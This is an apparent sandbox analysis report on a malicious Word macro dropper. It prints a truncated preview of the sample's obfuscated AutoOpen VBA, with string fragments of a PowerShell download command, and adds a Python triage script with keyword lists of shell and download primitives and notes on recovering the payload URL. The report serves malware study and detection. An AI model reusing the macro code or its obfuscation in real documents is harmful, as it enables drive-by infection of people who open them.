Verdict: MALICIOUS (Risk Score 242)
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a Microsoft Office (OLE) Word document containing a VBA macro project with an AutoOpen subroutine, so the macro runs as soon as the document is opened with macros enabled. The heuristics report a Shell() call (the extracted source preview is truncated before it), and the visible part of the source calls Application.Run and builds its strings at run time with Mid() over padded literals. Fragments recovered from those literals include -rePlAce, [chaR]124 and [chaR]36, which is PowerShell syntax for rebuilding a command from character codes. An AutoOpen macro and a Shell() call are not proof of malice on their own, but together with the ClamAV Doc.Dropper.Agent signature and this obfuscation pattern they indicate a dropper that downloads and executes a second-stage payload. The arithmetic lines in the preview (Sgn/Tan/ChrW over undeclared variables, guarded by On Error Resume Next) are dead code inserted to defeat simple signatures and should be ignored when reading the macro.
Heuristics (7)

- ClamAV (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6447443-0
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Note that for this sample a VBA project was in fact recovered (see the extracted macros.bas below), so this finding adds no evidence beyond the AutoOpen finding above.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard OOXML DrawingML namespace URI and is not a network indicator; the payload URL is assembled at run time inside the macro and is not present as a plain string.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25640 bytes | 53d6a4e6727c9c6a23659e2a28e8f7c891c295f88980a30572171aa8d1b194fa |

Preview: first 1,000 lines of the extracted script (truncated below)
```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "RolhNhBAlzU"
Sub AutoOpen()
On Error Resume Next
IbURopAzO = akFUiqiM - Sgn(TzWwsT) - (4474466 - Tan(1794515) / 2949476 - ChrW(uCKroRUMG))
mjnFXzuaz = dOawDAtlcbzRj - Sgn(WUWQsRDKiXa) - (6885182 - Tan(6124476) / 8869310 - ChrW(wwtXOmPTEGrujr))
kIUACiDcd = irSjCYTUzm - Sgn(dEtRwGASJ) - (132330 - Tan(4424063) / 4420376 - ChrW(uOFjdLv))
Application.Run "zjQNSRGUD", fXXANvLzJcImw
WULpWTfRf = XutNGEaiEcCJ - Sgn(hLUzpnT) - (6886681 - Tan(8293372) / 7781168 - ChrW(HJsEvfbjnWdc))
dFnKiBZjt = AiiBTp - Sgn(MDjGCGzMW) - (7569835 - Tan(4813459) / 122655 - ChrW(WzDiruC))
doiRFzuIO = tLlGaSzVb - Sgn(qwHNAiaqDavKZn) - (9974679 - Tan(4545403) / 4044589 - ChrW(AELozw))
End Sub
Function fXXANvLzJcImw()
On Error Resume Next
CcaNATYidf = OnMsTj - Sgn(rwsrk) - (5486110 - Tan(5093109) / 7059333 - ChrW(LFVI))
cNGMGhzuqw = smJUsijZUB - Sgn(MIULt) - (4837791 - Tan(5971870) / 2773271 - ChrW(PtLf))
KNSfsVGqTh = fiG - Sgn(WQv) - (8630177 - Tan(6915529) / 4309376 - ChrW(CYb))
JizdMFPjcw = EUXmkqhFzmb + Mid(CWiOXjwGRz + "LidfOWVZShPkuFYurzCNTW+fTWnPf;nP'+'f+nPf'+'HanPf'+'+nPfsYnPf+nP'+'fYU = .(nP'+'f+nPfYnPf+nPfzWnn'+'PfTW+fTWf+nP'+'fe0Oi+0OinPf'+'+'+'nPfYzWnPf+nPf+YzWnPfTW+fTWf+nPfwYnPf+nPfzWnPf+'+'Dcjtzhj" + PGrDXlHIrFhVRB, 21, 162)
jCuMtWVHIjz = TMwdYwkRT - Sgn(zLrADIhz) - (3202689 - Tan(3815573) / 181781 - ChrW(KchpjpnqT))
IjVTNlJV = YYEOJvti - Sgn(MDwI) - (2608365 - Tan(3795490) / 7320477 - ChrW(wUTiHdrC))
VwKKULaYI = vjPvidE - Sgn(mTvozlDmN) - (7724380 - Tan(4709260) / 2757731 - ChrW(UVzSoWz))
KZaZqKR = YSdriXU + Mid(YLma + "Inp.it/Ue8J/?hnPf+nijqDwWczoKYc" + BQwb, 4, 16)
iiBtmh = EkWY - Sgn(bJltXBFzWl) - (8726330 - Tan(4133450) / 1321830 - ChrW(pojuWFuYpYw))
tfksYzGiu = jtUmzEbIHqwWYs - Sgn(VROirLsASUq) - (9973589 - Tan(3710233) / 7482904 - ChrW(TNw))
HwVohNMaYSB = SMdjootwc - Sgn(rNVdVZHbqElqtC) - (3449523 - Tan(1345453) / 920872 - ChrW(VEWj))
MkWQzrWsjW = QuNMpAKOLiarh + Mid(AqiziPvup + "zilJVRijDnzuHHPAnPf+YnPf+fTW+f'+'TWnPfz0O'+'i+'+'0OiW-nPf+nPfobjectYznPf+nPfW)nPf+nPf nPf+nPfSynPf+nP0Oi+0OifsnPf+nP'+'ftenPf+nPfm.NenPf+nPft.WnPf+nPftlbccLYTZbJE" + nzbNRcp, 17, 134)
AIjwjH = DwhaCzGY - Sgn(rbKmiKIJf) - (2519606 - Tan(6715200) / 1724576 - ChrW(ERPsJMkrZSVwSw))
fiSkT = UpYkPBbzHv - Sgn(bTO) - (9379955 - Tan(9085166) / 737664 - ChrW(GuQKKo))
pTfYzNJUZXp = ojSJppQLcopow - Sgn(wcSIwIlQdcWRh) - (2287181 - Tan(889979) / 2945170 - ChrW(fkpbS))
dljEQLQLIs = zZXshZtzMPB + Mid(HUWzNvrWr + "tjiArNUtYzW) nPf+nPfra'+'ndomnPf+fGrNvOOzw" + cTaRhjlcYbIm, 8, 27)
kUEdBI = DIRdT - Sgn(prXVZDVPL) - (2167696 - Tan(352708) / 7486502 - ChrW(HSEfDM))
CwsAS = CuwjIdv - Sgn(DwEjwVNVInzCTW) - (2285495 - Tan(9478260) / 509576 - ChrW(wWswdNR))
ILaONMm = auuqNwHYMPGVow - Sgn(wvrFKAfjzdnjZ) - (916825 - Tan(938286) / 3743069 - ChrW(OwuSaSaBuvKw))
jqaiaWnc = pSFkPqZH + Mid(FWKR + "VTKVmodOjdFHd'Pf)fTW) -Cr0Oi+0OiEPLAce fT'+'WE7kfTW'+',[chaR]124 -rePlA0Oi+0OiCE ([chaR]102+[chaR]970Oi+0Oi+[ch0Oi+0OiaR]117),[chaR]36 -CrEPLAce ('rQ" + CNjJXFpmXIEHNi, 14, 138)
mGmcwpMTI = IjzJBiiHzzHfFA - Sgn(MbDAZZqwzZZ) - (3707154 - Tan(596483) / 8437425 - ChrW(aYmPRjkKFNhzp))
GwLXUvrabUa = UqX - Sgn(TDdRljX) - (3476842 - Tan(6461288) / 9640262 - ChrW(cPfPFZispiB))
PczaHjflOQ = QznsaAzij - Sgn(Bjo) - (3317777 - Tan(1637689) / 7481618 - ChrW(szB))
YPDLo = jfAbvClHHzuLv + Mid(ZPiTH + "UTQcWlrZUPGv+nPfnfTW+fTWvnPf+nPfoYfTW+fTWzWnPf+nPf+nPf+nPfYzWkYzWnPf+n0Oi+0OiPf+nPf+nPfYzWnPf+nPfenPf+nPf-ItnPf+nPfemYzW)(HasnPf+ZkavwNBXAvsawjUoSujqaM" + QHpBcVdREPEUmJ, 13, 117)
hAqPOTjm = ooU - Sgn(ppPWslTTSMEo) - (7681878 - Tan(2369396) / 9178892 - ChrW(RTcClGJzKq))
kbZQmr = lzRn - Sgn(wKBHCObO) - (1413840 - Tan(8905767) / 5721281 - ChrW(jcHcBB))
mFwwU = VMSDjjSLBc - Sgn(TAZjqdKofD) - (8496676 - Tan(2703705) / 9013068 - ChrW(cvNhjfkwiSLj))
szCOmjic = bdwCkkbmziiR +
... (truncated)
```
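The preview above shows the two things an analyst has to deal with in this sample: an auto-exec entry point that hands control to Application.Run and Shell(), and string fragments that only exist as Mid() slices of junk-padded literals. The following Python script is an added example, not the sandbox's detection code and not code from the sample, that reproduces the auto-exec and shell-call checks on extracted VBA source and statically recovers the Mid() slices. It relies on VBA semantics the preview depends on: under On Error Resume Next the undeclared names around each literal are Variant Empty, and Empty + "s" evaluates to "s", so only the literal reaches Mid(). The excerpt in SAMPLE_VBA is constructed from the preview (the two Mid() lines are copied from it verbatim); the Shell(KZaZqKR, 0) line is hypothetical, because the preview is truncated before the Shell() call that heuristic OLE_VBA_SHELL reports, and the keyword lists are illustrative rather than complete.

```python
"""Static triage of extracted VBA source (added example; not the sandbox's own code)."""
import re

# Constructed excerpt modelled on the macros.bas preview above. The two Mid() lines are
# copied verbatim from the preview; the Shell() line is hypothetical (the preview is
# truncated before the Shell() call reported by heuristic OLE_VBA_SHELL).
SAMPLE_VBA = r'''Attribute VB_Name = "RolhNhBAlzU"
Sub AutoOpen()
On Error Resume Next
IbURopAzO = akFUiqiM - Sgn(TzWwsT) - (4474466 - Tan(1794515) / 2949476 - ChrW(uCKroRUMG))
Application.Run "zjQNSRGUD", fXXANvLzJcImw
End Sub
Function fXXANvLzJcImw()
On Error Resume Next
CcaNATYidf = OnMsTj - Sgn(rwsrk) - (5486110 - Tan(5093109) / 7059333 - ChrW(LFVI))
KZaZqKR = YSdriXU + Mid(YLma + "Inp.it/Ue8J/?hnPf+nijqDwWczoKYc" + BQwb, 4, 16)
dljEQLQLIs = zZXshZtzMPB + Mid(HUWzNvrWr + "tjiArNUtYzW) nPf+nPfra'+'ndomnPf+fGrNvOOzw" + cTaRhjlcYbIm, 8, 27)
rc = Shell(KZaZqKR, 0)
End Function
'''

# Illustrative keyword lists (assumptions, not an exhaustive catalogue).
AUTOEXEC = ("AutoOpen", "AutoExec", "AutoClose", "Document_Open", "Document_Close",
            "Workbook_Open", "Auto_Open", "Auto_Close")
SUSPICIOUS = ("Shell", "Application.Run", "CreateObject", "WScript.Shell",
              "URLDownloadToFile", "XMLHTTP", "powershell")

# Mid(<junk> + "literal" + <junk>, start, length). The junk names are undeclared Variants
# (Empty), and Empty + "s" is "s" in VBA, so only the literal contributes to the argument.
MID_RE = re.compile(
    r'Mid\(\s*(?:\w+\s*\+\s*)?"((?:[^"]|"")*)"(?:\s*\+\s*\w+)?\s*,\s*(\d+)\s*,\s*(\d+)\s*\)')
# Dead-code filler of the form  x = a - Sgn(b) - (N - Tan(M) ...)  seen throughout the preview.
NOISE_RE = re.compile(r'=\s*\w+\s*-\s*Sgn\(\w+\)\s*-\s*\(\d+\s*-\s*Tan\(\d+\)')


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start; result is shortened (or empty) when the string is too short."""
    if start < 1 or length < 0:
        raise ValueError("Mid: start must be >= 1 and length >= 0")
    return s[start - 1:start - 1 + length]


def find_autoexec(src):
    """Names of auto-execution procedures defined in the source."""
    return [name for name in AUTOEXEC
            if re.search(r'\b(?:Sub|Function)\s+' + name + r'\b', src)]


def find_suspicious_calls(src):
    """Execution / download primitives referenced in the source (sorted, case-insensitive)."""
    return sorted(tok for tok in SUSPICIOUS
                  if re.search(r'(?<![\w.])' + re.escape(tok) + r'(?![\w])', src, re.IGNORECASE))


def recover_mid_slices(src):
    """Statically evaluate every Mid(<junk> + "literal" + <junk>, start, len) in the source."""
    out = []
    for lit, start, length in MID_RE.findall(src):
        out.append(vba_mid(lit.replace('""', '"'), int(start), int(length)))
    return out


def count_noise_lines(src):
    """Number of dead arithmetic filler lines (an obfuscation-density signal)."""
    return sum(1 for line in src.splitlines() if NOISE_RE.search(line))


def triage(src):
    """Combine the checks; auto-exec plus an execution primitive is the dropper pattern."""
    report = {
        "autoexec": find_autoexec(src),
        "suspicious_calls": find_suspicious_calls(src),
        "mid_slices": recover_mid_slices(src),
        "noise_lines": count_noise_lines(src),
    }
    report["verdict"] = ("suspicious" if report["autoexec"] and report["suspicious_calls"]
                         else "review")
    return report


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

Run against the real macros.bas by reading the file into `src` and calling `triage(src)`. The recovered slices are still one layer short of the final command: the `'+'` sequences inside them are PowerShell string concatenation noise, and the `nPf` and `fTW` tokens are placeholders that the `-rePlAce` / `[chaR]` operations visible at the end of the preview swap for characters such as `$` (36) and `|` (124), so the slices should be concatenated in script order and those replacements applied before searching for the download URL.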